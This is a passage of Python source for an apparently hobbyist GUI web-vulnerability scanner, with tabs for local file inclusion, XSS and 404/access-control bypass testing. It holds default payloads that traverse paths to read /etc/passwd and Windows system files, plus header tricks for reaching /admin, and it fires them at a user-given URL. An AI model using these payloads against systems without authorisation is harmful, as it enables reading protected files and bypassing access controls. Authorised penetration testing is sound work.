                                                         bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                         insertbackground=self.colors['accent'])
        self.lfi_payloads_text.insert('1.0', 
            "../../../etc/passwd\n"
            "/etc/passwd\n"
            "../../../../../../etc/passwd\n"
            "../../../../../../etc/passwd%00\n"
            "../../../../../../../../etc/passwd\n"
            "....//....//....//etc/passwd\n"
            "/var/log/apache2/access.log\n"
            "C:\\Windows\\system.ini\n"
            "C:\\boot.ini\n"
            "../../../../../../../../../../../../etc/hosts\n"
        )
        self.lfi_payloads_text.pack(fill='both', expand=True, padx=10, pady=(0, 10))
        self.themed_widgets.append(self.lfi_payloads_text)
    
    def load_lfi_payloads(self):
        """Load LFI payloads from file"""
        filepath = filedialog.askopenfilename(
            title="Select LFI Payload File",
            filetypes=[("Text files", "*.txt"), ("All files", "*.*")]
        )
        if not filepath:
            return
        
        try:
            with open(filepath, 'r', encoding='utf-8') as f:
                payloads = [line.strip() for line in f if line.strip()]
            
            self.lfi_payloads_text.delete('1.0', 'end')
            self.lfi_payloads_text.insert('1.0', '\n'.join(payloads))
            
            self.lfi_log("✅ Loaded {} LFI payloads from {}".format(len(payloads), filepath), 'success')
        except Exception as e:
            self.lfi_log(f"❌ Error loading file: {str(e)}", 'error')
            messagebox.showerror("Error", f"Failed to load file: {str(e)}")
    
    def lfi_log(self, message, level='info'):
        """Log message to LFI console"""
        timestamp = time.strftime('%H:%M:%S')
        
        # Color coding
        if level == 'error':
            color = self.colors['error']
        elif level == 'success':
            color = self.colors['success']
        elif level == 'warning':
            color = self.colors['warning']
        else:
            color = self.colors['text']
        
        self.lfi_log_text.insert('end', f"[{timestamp}] ", 'timestamp')
        self.lfi_log_text.insert('end', f"{message}\n", level)
        
        # Configure tags
        self.lfi_log_text.tag_config('timestamp', foreground=self.colors['text_dim'])
        self.lfi_log_text.tag_config(level, foreground=color)
        self.lfi_log_text.see('end')
    
    def clear_lfi_results(self):
        """Clear LFI results"""
        for item in self.lfi_tree.get_children():
            self.lfi_tree.delete(item)
        self.lfi_log_text.delete('1.0', 'end')
        self.lfi_results = []
    
    def stop_lfi_testing(self):
        """Stop LFI testing"""
        self.stop_scanning = True
        self.lfi_stop_btn.config(state='disabled')
        self.lfi_log("🛑 Stopping LFI scan...", 'warning')
    
    def setup_404_tab(self):
        """Setup the 404 bypass testing tab"""
        bypass_frame = ttk.Frame(self.notebook, style='Dark.TFrame')
        self.notebook.add(bypass_frame, text="🔎 404 BYPASS")
        
        # Main container
        main_container = tk.Frame(bypass_frame, bg=self.colors['bg_dark'])
        main_container.pack(fill='both', expand=True, padx=10, pady=10)
        self.themed_widgets.append(main_container)
        
        # Left panel - 404 Bypass Configuration
        bypass_left_panel = tk.Frame(main_container, bg=self.colors['bg_medium'], width=400)
        bypass_left_panel.pack(side='left', fill='y', padx=(0, 0))
        bypass_left_panel.pack_propagate(False)
        self.themed_widgets.append(bypass_left_panel)
        
        # Add separator between panels
        separator = tk.Frame(main_container, bg=self.colors['bg_light'], width=1)
        separator.pack(side='left', fill='y', padx=(10, 10))
        self.themed_widgets.append(separator)
        
        # 404 bypass specific configuration
        self.create_config_section(bypass_left_panel, "🎯 404 TARGET", self.create_404_target_config)
        self.create_config_section(bypass_left_panel, "🔍 BYPASS PAYLOADS", self.create_404_payloads_config)
        
        # Right panel - 404 Bypass Results
        bypass_right_panel = tk.Frame(main_container, bg=self.colors['bg_dark'])
        bypass_right_panel.pack(side='right', fill='both', expand=True)
        self.themed_widgets.append(bypass_right_panel)
        
        # 404 Control buttons
        bypass_control_frame = tk.Frame(bypass_right_panel, bg=self.colors['bg_dark'])
        bypass_control_frame.pack(fill='x', pady=(0, 10))
        
        self.bypass_start_btn = self.create_neon_button(bypass_control_frame, "🚀 START 404 SCAN", 
                                                      self.start_404_testing, self.colors['accent'])
        self.bypass_start_btn.pack(side='left', padx=5)
        
        self.bypass_stop_btn = self.create_neon_button(bypass_control_frame, "🛑 STOP", 
                                                     self.stop_404_testing, self.colors['error'])
        self.bypass_stop_btn.pack(side='left', padx=5)
        self.bypass_stop_btn.config(state='disabled')
        
        self.bypass_clear_btn = self.create_neon_button(bypass_control_frame, "🗑️ CLEAR", 
                                                      self.clear_404_results, self.colors['accent2'])
        self.bypass_clear_btn.pack(side='left', padx=5)
        
        # 404 Bypass Results section
        bypass_results_frame = tk.LabelFrame(bypass_right_panel, text="🔎 404 BYPASS SCAN RESULTS",
                                          font=('Arial', 12, 'bold'), fg=self.colors['success'],
                                          bg=self.colors['bg_medium'], bd=2, relief='groove')
        bypass_results_frame.pack(fill='both', expand=True, pady=(0, 10))
        self.themed_widgets.append(bypass_results_frame)
        
        # 404 Bypass Treeview
        bypass_tree_frame = tk.Frame(bypass_results_frame, bg=self.colors['bg_medium'])
        bypass_tree_frame.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(bypass_tree_frame)
        
        cols = ('Payload', 'Status', 'Code', 'Content-Length', 'Success')
        self.bypass_tree = ttk.Treeview(bypass_tree_frame, columns=cols, show='headings', height=15)
        for col in cols:
            self.bypass_tree.heading(col, text=col.upper())
            if col == 'Payload':
                self.bypass_tree.column(col, width=300)
            else:
                self.bypass_tree.column(col, width=120)
        
        # Scrollbar
        bypass_scrollbar = ttk.Scrollbar(bypass_tree_frame, orient='vertical', command=self.bypass_tree.yview)
        self.bypass_tree.configure(yscrollcommand=bypass_scrollbar.set)
        bypass_scrollbar.pack(side='right', fill='y')
        self.bypass_tree.pack(side='left', fill='both', expand=True)
        
        # 404 Bypass Console log
        bypass_console_frame = tk.LabelFrame(bypass_right_panel, text="💻 404 BYPASS CONSOLE",
                                          font=('Arial', 12, 'bold'), fg=self.colors['accent'],
                                          bg=self.colors['bg_medium'], bd=2, relief='groove')
        bypass_console_frame.pack(fill='both', expand=True)
        self.themed_widgets.append(bypass_console_frame)
        
        self.bypass_log_text = scrolledtext.ScrolledText(bypass_console_frame, height=10,
                                                       bg='black', fg=self.colors['accent'],
                                                       font=('Courier', 9), insertbackground=self.colors['accent'])
        self.bypass_log_text.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(self.bypass_log_text)
    
    def start_lfi_testing(self):
        """Start LFI testing process"""
        url_template = self.lfi_url_entry.get().strip()
        payloads = [line.strip() for line in self.lfi_payloads_text.get('1.0', 'end').splitlines() if line.strip()]
        detection_strings = [line.strip() for line in self.lfi_detection_text.get('1.0', 'end').splitlines() if line.strip()]
        
        if not url_template or not payloads:
            messagebox.showerror("Error", "URL and payloads are required!")
            return
        
        if not detection_strings:
            self.lfi_log("⚠️ Warning: No detection strings provided. Will only check status codes.", 'warning')
        
        # Clear results
        self.clear_lfi_results()
        self.stop_scanning = False
        
        self.lfi_start_btn.config(state='disabled', text="🔄 SCANNING...")
        self.lfi_stop_btn.config(state='normal')
        
        # Start LFI testing in background thread
        self.lfi_thread = threading.Thread(
            target=self._run_lfi_tests,
            args=(url_template, payloads, detection_strings),
            daemon=True
        )
        self.lfi_thread.start()
    
    def _run_lfi_tests(self, url_template, payloads, detection_strings):
        """Run LFI tests"""
        self.lfi_log("🔍 Starting LFI vulnerability scan...", 'info')
        
        # Test payloads
        successful_lfi = []
        
        for i, payload in enumerate(payloads, 1):
            if self.stop_scanning:
                break
            
            url = url_template.format(payload=payload)
            
            try:
                self.lfi_log(f"🔄 Testing [{i}/{len(payloads)}]: {payload}", 'info')
                response = requests.get(url, timeout=10, verify=False)
                
                # Check if any detection string is in the response
                content = response.text
                content_length = len(content)
                file_found = False
                matching_pattern = ""
                
                for detection in detection_strings:
                    if detection in content:
                        file_found = True
                        matching_pattern = detection
                        self.lfi_log(f"✅ LFI Detected! Found signature '{detection}' with payload: {payload}", 'success')
                        break
                
                # Add to results
                status = "VULNERABLE" if file_found else "FAILED"
                self.lfi_tree.insert('', 'end', values=(payload, status, response.status_code, 
                                                     content_length, "YES" if file_found else "NO"),
                                  tags=('lfi_found' if file_found else ''))
                
                if file_found:
                    successful_lfi.append((payload, status, response.status_code, content_length, matching_pattern))
                    self.lfi_results.append((payload, status, response.status_code, content_length, matching_pattern))
                else:
                    if response.status_code == 200:
                        self.lfi_log(f"ℹ️ {payload}: 200 OK but no LFI detected", 'info')
                    else:
                        self.lfi_log(f"🚫 {payload}: HTTP {response.status_code}", 'warning')
                
                # Update UI
                self.lfi_tree.yview_moveto(1)
                self.update()
                    
            except Exception as e:
                self.lfi_log(f"❌ Error testing {payload}: {str(e)}", 'error')
                self.lfi_tree.insert('', 'end', values=(payload, "ERROR", "N/A", "N/A", "NO"))
            
            # Update progress
            progress = (i / len(payloads)) * 100
            self.status_var.set(f"⚡ LFI SCANNING... {i}/{len(payloads)} ({progress:.1f}%)")
        
        # Configure tag for successful LFI
        self.lfi_tree.tag_configure('lfi_found', foreground=self.colors['success'])
        
        # Summary
        self.lfi_log("\n" + "="*60, 'info')
        self.lfi_log("📁 LFI SCAN SUMMARY", 'info')
        self.lfi_log("="*60, 'info')
        self.lfi_log(f"\n✅ SUCCESSFUL LFI PAYLOADS: {len(successful_lfi)}", 'success')
        
        for payload, status, code, cl, details in successful_lfi[:10]:
            self.lfi_log(f"  • {payload} - Status: {code}, Length: {cl}", 'success')
        
        if len(successful_lfi) > 10:
            self.lfi_log(f"  ... and {len(successful_lfi) - 10} more", 'info')
        
        # Reset UI
        self.lfi_start_btn.config(state='normal', text="🚀 START LFI SCAN")
        self.lfi_stop_btn.config(state='disabled')
        
        if self.stop_scanning:
            self.lfi_log("🛑 Scan stopped by user", 'warning')
            self.status_var.set("⚡ LFI SCAN STOPPED")
        else:
            self.lfi_log("✅ LFI vulnerability scan completed", 'success')
            self.status_var.set(f"⚡ LFI SCAN COMPLETE - {len(successful_lfi)} VULNERABILITIES FOUND!")
    
    def start_xss_testing(self):
        """Start XSS testing process"""
        url_template = self.xss_url_entry.get().strip()
        baseline_value = self.xss_baseline_entry.get().strip()
        payloads = [line.strip() for line in self.xss_payloads_text.get('1.0', 'end').splitlines() if line.strip()]
        
        if not url_template or not payloads:
            messagebox.showerror("Error", "URL and payloads are required!")
            return
        
        # Clear results
        self.clear_xss_results()
        self.stop_scanning = False
        
        self.xss_start_btn.config(state='disabled', text="🔄 SCANNING...")
        self.xss_stop_btn.config(state='normal')
        
        # Start XSS testing in background thread
        self.xss_thread = threading.Thread(
            target=self._run_xss_tests,
            args=(url_template, baseline_value, payloads),
            daemon=True
        )
        self.xss_thread.start()
    
    def _run_xss_tests(self, url_template, baseline_value, payloads):
        """Run XSS tests"""
        # First, get baseline content length
        self.xss_log("📊 Getting baseline content length...", 'info')
        baseline_url = url_template.format(payload=baseline_value)
        
        try:
            response = requests.get(baseline_url, timeout=10)
            self.baseline_content_length = len(response.content)
            self.xss_log(f"✅ Baseline content length: {self.baseline_content_length} bytes", 'success')
        except Exception as e:
            self.xss_log(f"❌ Failed to get baseline: {str(e)}", 'error')
            self.baseline_content_length = 0
        
        # Test payloads
        successful_xss = []
        
        for i, payload in enumerate(payloads, 1):
            if self.stop_scanning:
                break
            
            url = url_template.format(payload=payload)
            
            try:
                response = requests.get(url, timeout=10)
                code = response.status_code
                content_length = len(response.content)
                length_diff = content_length - self.baseline_content_length
                
                # Only consider 200 OK responses
                if code == 200:
                    # Check if it's truly ALLOWED (not blocked/filtered)
                    if length_diff > 100:  # Significant change might indicate success
                        status = 'ALLOWED'
                        self.xss_log(f"✅ XSS FOUND: {payload} | Length diff: {length_diff}", 'success')
                        
                        # Add to tree (only successful XSS)
                        self.xss_tree.insert('', 'end', 
                                           values=(payload, status, code, content_length, f"+{length_diff}"),
                                           tags=('xss_found',))
                        self.xss_tree.tag_configure('xss_found', foreground=self.colors['success'])
                        
                        successful_xss.append((payload, status, code, content_length, length_diff))
                        self.xss_results.append((payload, status, code, content_length, length_diff))
                    else:
                        # 200 but no significant change - likely filtered
                        self.xss_log(f"⚠️ {payload}: 200 OK but no reflection (diff: {length_diff})", 'warning')
                else:
                    self.xss_log(f"🚫 {payload}: HTTP {code}", 'warning')
                    
            except Exception as e:
                self.xss_log(f"❌ {payload}: {str(e)}", 'error')
            
            # Update progress
            progress = (i / len(payloads)) * 100
            self.status_var.set(f"⚡ XSS SCANNING... {i}/{len(payloads)} ({progress:.1f}%)")
        
        # Summary
        self.xss_log("\n" + "="*60, 'info')
        self.xss_log("🎯 XSS SCAN SUMMARY", 'info')
        self.xss_log("="*60, 'info')
        self.xss_log(f"\n✅ SUCCESSFUL XSS PAYLOADS: {len(successful_xss)}", 'success')
        
        for payload, status, code, cl, diff in successful_xss[:10]:
            self.xss_log(f"  • {payload} | +{diff} bytes", 'success')
        
        if len(successful_xss) > 10:
            self.xss_log(f"  ... and {len(successful_xss) - 10} more", 'info')
        
        # Reset UI
        self.xss_start_btn.config(state='normal', text="🚀 START XSS SCAN")
        self.xss_stop_btn.config(state='disabled')
        
        if self.stop_scanning:
            self.status_var.set(f"⚡ XSS SCAN STOPPED")
        else:
            self.status_var.set(f"⚡ XSS SCAN COMPLETE - {len(successful_xss)} VULNERABILITIES FOUND!")
    
    def animate_status(self):
        """Animate status bar"""
        if hasattr(self, 'status_animation'):
            current = self.status_var.get()
            if "⚡" in current:
                self.status_var.set(current.replace("⚡", "💫"))
            else:
                self.status_var.set(current.replace("💫", "⚡"))
        self.status_animation = self.after(1000, self.animate_status)
    
    def log(self, message, level='info'):
        """Enhanced logging with colors"""
        timestamp = time.strftime('%H:%M:%S')
        
        # Color coding
        if level == 'error' or 'ERROR' in message:
            color = self.colors['error']
        elif level == 'success' or 'ALLOWED' in message or '200' in message:
            color = self.colors['success']
        elif level == 'warning' or 'BLOCKED' in message or '403' in message:
            color = self.colors['warning']
        else:
            color = self.colors['text']
        
        self.log_text.insert('end', f"[{timestamp}] ", 'timestamp')
        self.log_text.insert('end', f"{message}\n", level)
        
        # Configure tags
        self.log_text.tag_config('timestamp', foreground=self.colors['text_dim'])
        self.log_text.tag_config(level, foreground=color)
        self.log_text.see('end')
    
    def update_widget_theme(self, widget):
        """Update a single widget with new theme colors"""
        try:
            widget_type = widget.winfo_class()
            
            if widget_type == 'Frame' or widget_type == 'Toplevel':
                widget.config(bg=self.colors['bg_dark'])
            elif widget_type == 'Label':
                if hasattr(widget, 'cget') and 'text' in widget.keys():
                    # Check if it's a special label
                    if widget == self.ascii_label or widget == self.ai_header:
                        widget.config(bg=self.colors['bg_dark'], fg=self.colors['accent'])
                    else:
                        widget.config(bg=widget.master.cget('bg'), fg=self.colors['text'])
            elif widget_type == 'LabelFrame':
                widget.config(bg=self.colors['bg_medium'], fg=self.colors['accent'])
            elif widget_type == 'Button':
                if hasattr(widget, 'neon_color'):
                    # Map old colors to new colors
                    if 'accent3' in widget.neon_color or '#00d9ff' in widget.neon_color:
                        color = self.colors['accent3']
                    elif 'accent2' in widget.neon_color or '#ff006e' in widget.neon_color:
                        color = self.colors['accent2']
                    elif 'error' in widget.neon_color or '#ff3366' in widget.neon_color:
                        color = self.colors['error']
                    elif 'warning' in widget.neon_color or '#ffaa00' in widget.neon_color:
                        color = self.colors['warning']
                    else:
                        color = self.colors['accent']
                    widget.config(bg=self.colors['bg_dark'], fg=color,
                                activebackground=self.colors['bg_light'],
                                highlightbackground=color, highlightcolor=color)
            elif widget_type == 'Entry':
                widget.config(bg=self.colors['bg_dark'], fg=self.colors['text'],
                            insertbackground=self.colors['accent'])
            elif widget_type == 'Text' or widget_type == 'ScrolledText':
                if widget == self.log_text or widget == self.analysis_text:
                    widget.config(bg='black', fg=self.colors['accent'],
                                insertbackground=self.colors['accent'])
                else:
                    widget.config(bg=self.colors['bg_dark'], fg=self.colors['text'],
                                insertbackground=self.colors['accent'])
            elif widget_type == 'Spinbox':
                widget.config(bg=self.colors['bg_light'], fg=self.colors['accent'],
                            insertbackground=self.colors['accent'])
            elif widget_type == 'Radiobutton':
                widget.config(bg=self.colors['bg_medium'], fg=self.colors['text'],
                            selectcolor=self.colors['bg_dark'],
                            activebackground=self.colors['bg_medium'])
            elif widget_type == 'Checkbutton':
                widget.config(bg=self.colors['bg_medium'], fg=self.colors['text'],
                            selectcolor=self.colors['bg_dark'],
                            activebackground=self.colors['bg_medium'])
        except Exception as e:
            pass  # Skip widgets that can't be updated
        
    def create_404_target_config(self, parent):
        """404 bypass target configuration"""
        tk.Label(parent, text="Target URL Base:", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium']).pack(anchor='w', padx=10, pady=(10, 0))
        
        self.bypass_url_entry = tk.Entry(parent, font=('Arial', 10), bg=self.colors['bg_dark'],
                                       fg=self.colors['text'], insertbackground=self.colors['accent'])
        self.bypass_url_entry.insert(0, "https://example.com/{payload}")
        self.bypass_url_entry.pack(fill='x', padx=10, pady=(0, 10))
        self.themed_widgets.append(self.bypass_url_entry)
        
        # HTTP Methods for 404 bypass
        method_frame = tk.Frame(parent, bg=self.colors['bg_medium'])
        method_frame.pack(fill='x', padx=10, pady=5)
        self.themed_widgets.append(method_frame)
        
        tk.Label(method_frame, text="HTTP Methods:", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium']).pack(side='left', padx=(0, 10))
        
        self.bypass_method = tk.StringVar(value='GET')
        for method in ['GET', 'POST', 'HEAD']:
            rb = tk.Radiobutton(method_frame, text=method, variable=self.bypass_method,
                              value=method, font=('Arial', 10), fg=self.colors['text'],
                              bg=self.colors['bg_medium'], selectcolor=self.colors['bg_dark'],
                              activebackground=self.colors['bg_medium'])
            rb.pack(side='left', padx=10)
            self.themed_widgets.append(rb)
            
        # 404 detection settings
        tk.Label(parent, text="404 Detection Strings (in normal 404 page):", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium']).pack(anchor='w', padx=10, pady=(10, 0))
        
        self.bypass_404_detection_text = scrolledtext.ScrolledText(parent, height=3, font=('Courier', 9),
                                                                bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                                insertbackground=self.colors['accent'])
        self.bypass_404_detection_text.insert('1.0',
            "Page not found\n"
            "404 Not Found\n"
            "The requested URL was not found\n"
            "File or directory not found\n"
        )
        self.bypass_404_detection_text.pack(fill='x', padx=10, pady=(0, 10))
        self.themed_widgets.append(self.bypass_404_detection_text)
        
        # Custom headers for 404 bypass
        tk.Label(parent, text="Bypass Headers (one per line, format: Name: Value):", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium']).pack(anchor='w', padx=10, pady=(10, 0))
        
        self.bypass_headers_text = scrolledtext.ScrolledText(parent, height=4, font=('Courier', 9),
                                                          bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                          insertbackground=self.colors['accent'])
        self.bypass_headers_text.insert('1.0',
            "X-Original-URL: /admin\n"
            "X-Rewrite-URL: /admin\n"
            "X-Forwarded-For: 127.0.0.1\n"
            "Referer: https://example.com/admin\n"
        )
        self.bypass_headers_text.pack(fill='x', padx=10, pady=(0, 10))
        self.themed_widgets.append(self.bypass_headers_text)
    
    def create_404_payloads_config(self, parent):
        """404 bypass payloads configuration"""
        # Load 404 bypass payloads button
        load_bypass_btn = self.create_neon_button(parent, "📁 LOAD 404 PAYLOADS", 
                                                self.load_404_payloads, self.colors['accent3'])
        load_bypass_btn.pack(fill='x', padx=10, pady=10)
        
        # 404 bypass payloads text area
        self.bypass_payloads_text = scrolledtext.ScrolledText(parent, height=14, font=('Consolas', 10),
                                                           bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                           insertbackground=self.colors['accent'])
        self.bypass_payloads_text.insert('1.0', 
            "admin\n"
            "admin/\n"
            "admin/.\n"
            "admin//\n"
            "admin/.//\n"
            "admin/%2e/\n"
            "admin/~/\n"
            "admin.php\n"
            "admin.asp\n"
            "admin.html\n"
            "admin.php.bak\n"
            "admin;/\n"
            "ADMIN\n"
            "Admin\n"
            "admin.php%20\n"
            "admin.php%0a\n"
            "admin.php.\n"
            "admin\\.php\n"
            "admin/index\n"
            "%2e/admin\n"
            ".../admin\n"
            "../admin\n"
            "..%2fadmin\n"
            "..//admin\n"
            "..\\admin\n"
        )
        self.bypass_payloads_text.pack(fill='both', expand=True, padx=10, pady=(0, 10))
        self.themed_widgets.append(self.bypass_payloads_text)
    
    def load_404_payloads(self):
        """Load 404 bypass payloads from file or auto-load from directory"""
        # Create a popup menu to choose the source
        menu = tk.Menu(self, tearoff=0, bg=self.colors['bg_dark'], fg=self.colors['text'],
                      activebackground=self.colors['bg_light'], activeforeground=self.colors['accent'])
        menu.add_command(label="📄 From File...", command=self.load_404_payloads_from_file)
        menu.add_command(label="🔄 Auto-Load from Directory", 
                        command=lambda: self.auto_load_404_payloads())
        menu.add_command(label="🔄 Generate Combined Payloads", 
                        command=lambda: self.generate_combined_404_payloads())
        
        # Show the menu at the current mouse position
        try:
            menu.tk_popup(self.winfo_pointerx(), self.winfo_pointery())
        finally:
            menu.grab_release()
    
    def load_404_payloads_from_file(self):
        """Load 404 bypass payloads from file"""
        filepath = filedialog.askopenfilename(
            title="Select 404 Bypass Payload File",
            filetypes=[("Text files", "*.txt"), ("All files", "*.*")]
        )
        if not filepath:
            return
        
        try:
            with open(filepath, 'r', encoding='utf-8') as f:
                payloads = [line.strip() for line in f.readlines() if line.strip()]
            
            self.bypass_payloads_text.delete('1.0', 'end')
            self.bypass_payloads_text.insert('1.0', '\n'.join(payloads))
            
            self.bypass_log("✅ Loaded {} 404 bypass payloads from {}".format(len(payloads), filepath), 'success')
        except Exception as e:
            self.bypass_log(f"❌ Error loading file: {str(e)}", 'error')
            messagebox.showerror("Error", f"Failed to load file: {str(e)}")
    
    def bypass_log(self, message, level='info'):
        """Log message to 404 bypass console"""
        timestamp = time.strftime('%H:%M:%S')
        
        # Color coding
        if level == 'error':
            color = self.colors['error']
        elif level == 'success':
            color = self.colors['success']
        elif level == 'warning':
            color = self.colors['warning']
        else:
            color = self.colors['text']
        
        self.bypass_log_text.insert('end', f"[{timestamp}] ", 'timestamp')
        self.bypass_log_text.insert('end', f"{message}\n", level)
        
        # Configure tags
        self.bypass_log_text.tag_config('timestamp', foreground=self.colors['text_dim'])
        self.bypass_log_text.tag_config(level, foreground=color)
        self.bypass_log_text.see('end')
    
    def auto_load_404_payloads(self):
        """Auto-load 404 bypass payloads from the Payloads/404 directory"""
        base_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "Payloads", "404")
        
        if not os.path.exists(base_path):
            self.bypass_log("❌ Error: 404 payloads directory not found", 'error')
            messagebox.showerror("Error", "404 payloads directory not found")
            return
        
        # Files to load
        url_payloads_file = os.path.join(base_path, "url_payloads.txt")
        
        try:
            # Load URL payloads
            if os.path.exists(url_payloads_file):
                with open(url_payloads_file, 'r', encoding='utf-8') as f:
                    payloads = [line.strip() for line in f.readlines() if line.strip()]
                
                self.bypass_payloads_text.delete('1.0', 'end')
                self.bypass_payloads_text.insert('1.0', '\n'.join(payloads))
                
                self.bypass_log(f"✅ Loaded {len(payloads)} URL payloads from {url_payloads_file}", 'success')
            else:
                self.bypass_log("⚠️ URL payloads file not found", 'warning')
        
        except Exception as e:
            self.bypass_log(f"❌ Error loading 404 payloads: {str(e)}", 'error')
            messagebox.showerror("Error", f"Failed to load 404 payloads: {str(e)}")
    
    def generate_combined_404_payloads(self):
        """Generate combined payloads using URL, IP, and header payloads"""
        base_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "Payloads", "404")
        
        if not os.path.exists(base_path):
            self.bypass_log("❌ Error: 404 payloads directory not found", 'error')
            messagebox.showerror("Error", "404 payloads directory not found")
            return
        
        # Files to load
        url_payloads_file = os.path.join(base_path, "url_payloads.txt")
        ip_payloads_file = os.path.join(base_path, "ip_payloads.txt")
        header_templates_file = os.path.join(base_path, "header_payload_templates.txt")
        
        try:
            # Load URL payloads
            url_payloads = []
            if os.path.exists(url_payloads_file):
                with open(url_payloads_file, 'r', encoding='utf-8') as f:
                    url_payloads = [line.strip() for line in f.readlines() if line.strip()]
                self.bypass_log(f"✅ Loaded {len(url_payloads)} URL payloads", 'success')
            else:
                self.bypass_log("⚠️ URL payloads file not found", 'warning')
            
            # Load IP payloads
            ip_payloads = []
            if os.path.exists(ip_payloads_file):
                with open(ip_payloads_file, 'r', encoding='utf-8') as f:
                    ip_payloads = [line.strip() for line in f.readlines() if line.strip()]
                self.bypass_log(f"✅ Loaded {len(ip_payloads)} IP payloads", 'success')
            else:
                self.bypass_log("⚠️ IP payloads file not found", 'warning')
            
            # Load header templates
            header_templates = []
            if os.path.exists(header_templates_file):
                with open(header_templates_file, 'r', encoding='utf-8') as f:
                    header_templates = [line.strip() for line in f.readlines() if line.strip()]
                self.bypass_log(f"✅ Loaded {len(header_templates)} header templates", 'success')
            else:
                self.bypass_log("⚠️ Header templates file not found", 'warning')
            
            # Generate combined payloads - add some URL payloads directly
            combined_payloads = url_payloads[:20]  # Take first 20 URL payloads as-is
            
            # Add header payload combinations
            headers_combined = []
            for template in header_templates[:10]:  # Take first 10 header templates
                if "{IP PAYLOAD}" in template:
                    for ip in ip_payloads[:5]:  # Combine with first 5 IP payloads
                        header = template.replace("{IP PAYLOAD}", ip)
                        if ": " in header:  # Add only valid headers
                            headers_combined.append(header)
                
                if "{URL PAYLOAD}" in template:
                    for url in url_payloads[:5]:  # Combine with first 5 URL payloads
                        header = template.replace("{URL PAYLOAD}", url)
                        if ": " in header:  # Add only valid headers
                            headers_combined.append(header)
            
            # Add the header payloads to the custom headers text area
            self.bypass_headers_text.delete('1.0', 'end')
            self.bypass_headers_text.insert('1.0', '\n'.join(headers_combined))
            
            # Update the URL payloads text area
            self.bypass_payloads_text.delete('1.0', 'end')
            self.bypass_payloads_text.insert('1.0', '\n'.join(combined_payloads))
            
            self.bypass_log(f"✅ Generated {len(combined_payloads)} URL payloads and {len(headers_combined)} header payloads", 'success')
            
        except Exception as e:
            self.bypass_log(f"❌ Error generating combined payloads: {str(e)}", 'error')
            messagebox.showerror("Error", f"Failed to generate combined payloads: {str(e)}")
    
    def clear_404_results(self):
        """Clear 404 bypass results"""
        for item in self.bypass_tree.get_children():
            self.bypass_tree.delete(item)
        self.bypass_log_text.delete('1.0', 'end')
        self.bypass_results = []
    
    def stop_404_testing(self):
        """Stop 404 bypass testing"""
        self.stop_scanning = True
        self.bypass_stop_btn.config(state='disabled')
        self.bypass_log("🛑 Stopping 404 bypass scan...", 'warning')
    
    def start_404_testing(self):
        """Start 404 bypass testing process"""
        url_template = self.bypass_url_entry.get().strip()
        payloads = [line.strip() for line in self.bypass_payloads_text.get('1.0', 'end').splitlines() if line.strip()]
        detection_strings = [line.strip() for line in self.bypass_404_detection_text.get('1.0', 'end').splitlines() if line.strip()]
        
        if not url_template or not payloads:
            messagebox.showerror("Error", "URL and payloads are required!")
            return
        
        if not detection_strings:
            self.bypass_log("⚠️ Warning: No 404 detection strings provided. Will only check status codes.", 'warning')
        
        # Parse headers
        raw_headers = self.bypass_headers_text.get('1.0', 'end')
        headers = {}
        for line in raw_headers.splitlines():
            line = line.strip()
            if line and ': ' in line:
                key, value = line.split(': ', 1)
                headers[key] = value
        
        # Get HTTP method
        method = self.bypass_method.get()
        
        # Clear results
        self.clear_404_results()
        self.stop_scanning = False
        
        self.bypass_start_btn.config(state='disabled', text="🔄 SCANNING...")
        self.bypass_stop_btn.config(state='normal')
        
        # Start 404 bypass testing in background thread
        self.bypass_thread = threading.Thread(
            target=self._run_404_tests,
            args=(url_template, payloads, detection_strings, headers, method),
            daemon=True
        )
        self.bypass_thread.start()
    
    def _run_404_tests(self, url_template, payloads, detection_strings, headers, method):
        """Run 404 bypass tests"""
        self.bypass_log("🔍 Starting 404 bypass vulnerability scan...", 'info')
        
        # Get baseline first (using a known 404 path)
        self.bypass_log("📊 Getting baseline 404 response...", 'info')
        baseline_url = url_template.format(payload="this_should_404_" + str(random.randint(10000, 99999)))
        
        try:
            if method == 'GET':
                baseline_response = requests.get(baseline_url, headers=headers, timeout=10)
            elif method == 'POST':
                baseline_response = requests.post(baseline_url, headers=headers, timeout=10)
            else:  # HEAD
                baseline_response = requests.head(baseline_url, headers=headers, timeout=10)
                
            baseline_status = baseline_response.status_code
            baseline_content = baseline_response.text if method != 'HEAD' else ""
            baseline_length = len(baseline_content)
            
            self.bypass_log(f"✅ Baseline 404 response: HTTP {baseline_status}, Length: {baseline_length} bytes", 'info')
        except Exception as e:
            self.bypass_log(f"❌ Failed to get baseline: {str(e)}", 'error')
            baseline_status = 404
            baseline_content = ""
            baseline_length = 0
        
        # Test payloads
        successful_bypasses = []
        
        # Parse headers from the text area for individual testing
        raw_headers_text = self.bypass_headers_text.get('1.0', 'end')
        header_lines = [line.strip() for line in raw_headers_text.splitlines() if line.strip() and ': ' in line]
        
        # Track total tests for progress calculation
        total_tests = len(payloads) * (1 + min(len(header_lines), 1))  # Basic test + header tests (at least 1)
        tests_completed = 0
        
        for i, payload in enumerate(payloads, 1):
            if self.stop_scanning:
                break
            
            url = url_template.format(payload=payload)
            
            # 1. First try with standard headers
            try:
                self.bypass_log(f"🔄 Testing URL: {payload}", 'info')
                
                if method == 'GET':
                    response = requests.get(url, headers=headers, timeout=10)
                elif method == 'POST':
                    response = requests.post(url, headers=headers, timeout=10)
                else:  # HEAD
                    response = requests.head(url, headers=headers, timeout=10)
                
                code = response.status_code
                content = response.text if method != 'HEAD' else ""
                content_length = len(content)
                
                # Determine if bypass was successful
                is_404_page = False
                
                # Check if the response is different from baseline
                if code != baseline_status:
                    # Different status code - potential bypass
                    is_404_page = False
                elif method != 'HEAD':
                    # Check for 404 detection strings
                    for pattern in detection_strings:
                        if pattern in baseline_content and pattern not in content:
                            # 404 indicator missing from response - potential bypass
                            is_404_page = False
                            break
                        elif pattern not in baseline_content and pattern in content:
                            # 404 indicator in response - likely still a 404
